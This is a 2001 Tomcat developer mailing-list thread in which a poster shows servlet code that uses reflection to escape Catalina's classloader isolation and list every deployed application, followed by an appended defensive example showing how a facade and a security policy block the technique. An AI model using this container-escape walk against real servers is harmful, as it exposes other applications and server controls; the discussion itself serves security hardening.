tomcat-dev mailing list archives

From Fabien Le Floc'h <...@operamail.com>
Subject Re: security and a servlet using core catalina classes
Date Thu, 10 May 2001 02:44:50 GMT
OK, it is possible to bypass the "security"!

Catalina conforms to the behavior in the Servlet 2.3 PFD2 Specification (Section 9.7.2) but
does not comply with its "recommended" behavior.

Here is the code (not clean, sorry about that) for the doGet method of a regular servlet:

    import java.io.IOException;
    import java.io.PrintWriter;
    import java.lang.reflect.Method;
    import javax.servlet.ServletException;
    import javax.servlet.http.HttpServlet;
    import javax.servlet.http.HttpServletRequest;
    import javax.servlet.http.HttpServletResponse;

    public class InspectorServlet extends HttpServlet {

        public void doGet(HttpServletRequest request, HttpServletResponse response)
                throws ServletException, IOException {
            response.setContentType("text/plain");
            PrintWriter writer = response.getWriter();

            // In this Catalina build the ServletConfig handed to the servlet is the
            // container's own Wrapper object, so its getParent() chain is reachable by
            // reflection even though the web application's class loader cannot see the
            // implementation classes.
            Object theWrapper = this.getServletConfig();
            try {
                // Wrapper -> Context
                Method method = theWrapper.getClass().getMethod("getParent", new Class[] {});
                Object theContext = method.invoke(theWrapper, new Object[] {});
                // Context -> Host (the Deployer)
                method = theContext.getClass().getMethod("getParent", new Class[] {});
                Object theDeployer = method.invoke(theContext, new Object[] {});
                // Deployer.findDeployedApps() lists every web application on the host
                method = theDeployer.getClass().getMethod("findDeployedApps", new Class[] {});
                String[] apps = (String[]) method.invoke(theDeployer, new Object[] {});
                writer.println("detected apps:");
                for (int i = 0; i < apps.length; i++) {
                    writer.println(apps[i]);
                }
            } catch (Exception e) {
                e.printStackTrace();
                writer.println("An exception occurred when invoking the method, " + e.getMessage());
            }
            writer.flush();
            writer.close();
        }
    }


My project is to build a servlet inspector servlet for Tomcat in order to have a Dynamo DCC-like
feature.

Regards,

Fabien


"Craig R. McClanahan" <craigmcc@apache.org> writes:

> On 9 May 2001, Fabien Le Floc'h wrote:
> 
> > Thanks for your answer,
> > 
> > I decided to put my servlet in the catalina hierarchy (on my personal
> > computer). When it will be more advanced, I could even propose it as a
> > contribution to catalina.
> > 
> 
> Any hints on what it actually does?
> 
> > But I think would have been possible to bypass the "security" by just
> > using reflection to call the core methods.
> > 
> 
> Doing this would mean making it possible for an end user servlet to do
> nasty things like shut down the server, or snoop the sessions of some
> other web app.  Once you have access to the server's internals, there is
> basically no method you would not be able to call.
> 
> In addition, the current Catalina architecture conforms to a suggested
> behavior in the Servlet 2.3 PFD2 Specification (Section 9.7.2):
> 
>     "The classloader that a container uses to load a servlet in
>     a WAR must not allow the WAR to override J2SE or Java servlet
>     API classes.  It is further recommended that the loader not
>     allow servlets in the WAR access to the web container's
>     implementation classes."
> 
> > Regards,
> > 
> > Fabien
> > 
> 
> Craig
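The weakness Fabien demonstrates is not the reflection itself but the fact that the object handed to the servlet as its ServletConfig is the container's own Wrapper, whose public getParent() leads straight up to the Host. The following is an added example, not code from this thread or from Catalina: it models the hierarchy with hypothetical stand-in classes (Container, Deployer, Wrapper, WrapperFacade, Config), runs the same reflective walk against the raw wrapper and against a facade that holds the wrapper in a private field and exposes only the ServletConfig-style methods. The walk succeeds against the first and fails at the first getMethod("getParent") against the second. This is the facade approach later Catalina releases take with StandardWrapperFacade.

```java
import java.lang.reflect.Method;

// Added example with a hypothetical container model; none of these classes are Catalina's.
public class FacadeDemo {

    /** Minimal stand-in for javax.servlet.ServletConfig. */
    public interface Config {
        String getServletName();
    }

    /** Stand-in for a Catalina Container: every node knows its parent. */
    public static class Container {
        private final Container parent;
        private final String name;
        public Container(String name, Container parent) { this.name = name; this.parent = parent; }
        public Container getParent() { return parent; }
        public String getName() { return name; }
    }

    /** Stand-in for a Host that implements Deployer and knows every deployed web application. */
    public static class Deployer extends Container {
        private final String[] apps;
        public Deployer(String[] apps) { super("localhost", null); this.apps = apps; }
        public String[] findDeployedApps() { return apps.clone(); }
    }

    /** Weak design: the wrapper itself is the ServletConfig handed to the servlet. */
    public static class Wrapper extends Container implements Config {
        public Wrapper(String name, Container parent) { super(name, parent); }
        public String getServletName() { return getName(); }
    }

    /** Hardened design: a facade that holds the wrapper privately and exposes only Config. */
    public static final class WrapperFacade implements Config {
        private final Wrapper wrapper;
        public WrapperFacade(Wrapper wrapper) { this.wrapper = wrapper; }
        public String getServletName() { return wrapper.getServletName(); }
    }

    /** The reflective walk from the message: config -> context -> deployer -> deployed apps. */
    public static String[] walk(Object config) throws Exception {
        Method m = config.getClass().getMethod("getParent");   // throws NoSuchMethodException on the facade
        Object context = m.invoke(config);
        m = context.getClass().getMethod("getParent");
        Object deployer = m.invoke(context);
        m = deployer.getClass().getMethod("findDeployedApps");
        return (String[]) m.invoke(deployer);
    }

    public static void main(String[] args) {
        // Constructed sample hierarchy: one host with three web applications.
        Deployer host = new Deployer(new String[] {"/", "/manager", "/examples"});
        Container context = new Container("/examples", host);
        Wrapper wrapper = new Wrapper("inspector", context);

        try {
            System.out.println("raw wrapper: " + String.join(" ", walk(wrapper)));
        } catch (Exception e) {
            System.out.println("raw wrapper blocked: " + e);
        }
        try {
            System.out.println("facade: " + String.join(" ", walk(new WrapperFacade(wrapper))));
        } catch (NoSuchMethodException e) {
            System.out.println("facade blocked: " + e);
        } catch (Exception e) {
            System.out.println("facade: unexpected " + e);
        }
    }
}
```

Compile and run with `javac FacadeDemo.java && java FacadeDemo`. The facade is only defense in depth: without a SecurityManager a servlet can still call setAccessible(true) on the facade's private field and pull the wrapper out, so the real boundary has to be a security policy that denies the web application reflective access to container internals, which is the point Craig makes about what a servlet could do once it reaches them.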

